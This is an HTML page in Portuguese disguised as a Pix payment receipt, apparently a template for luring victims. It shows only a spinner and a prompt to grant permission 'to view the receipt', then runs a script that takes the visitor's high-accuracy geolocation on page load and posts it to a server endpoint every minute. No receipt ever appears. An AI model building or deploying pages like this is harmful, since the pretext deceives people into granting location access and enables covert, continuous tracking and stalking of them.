<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

<meta property="og:description"
<meta property="og:image" content=" https://images.app.goo.gl/4Ctn"/>
<meta property="og:type" content="website" />
<meta property="og:url" content="URL_DO_SEU_SISTEMA" />

    <title> Comprovante de pagamento Pix...</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #282c34;
            color: white;
            text-align: center;
        }

        .loader {
            width: 50px;
            height: 50px;
            border: 5px solid rgba(255, 255, 255, 0.3);
            border-top: 5px solid white;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin-bottom: 20px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .status {
            font-size: 20px;
            margin-top: 10px;
            animation: blink 1.5s infinite alternate;
        }

        @keyframes blink {
            from { opacity: 1; }
            to { opacity: 0.5; }
        }
    </style>
</head>
<body>

    <div>
        <div class="loader"></div>
        <p class="status">Permita a opção para visualizar o comprovante ...</p>
    </div>

    <script>
        function sendLocation() {
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(position => {
                    const { latitude, longitude } = position.coords;
                    fetch('/update_location', {
                        method: 'POST',
                        headers: { 'Content-Type': 'application/json' },
                        body: JSON.stringify({ latitude, longitude })
                    })
                    .then(response => response.json())
                    .then(data => {
                        console.log('Localização enviada:', data);
                    })
                    .catch(error => console.error('Erro ao enviar localização:', error));
                }, error => {
                    console.error('Erro ao obter localização:', error);
                }, { enableHighAccuracy: true });
            } else {
                console.error('Geolocalização não é suportada pelo seu navegador.');
            }
        }

        sendLocation(); // Enviar ao carregar
        setInterval(sendLocation, 60000); // Enviar a cada 1 minuto
    </script>

</body>
</html>
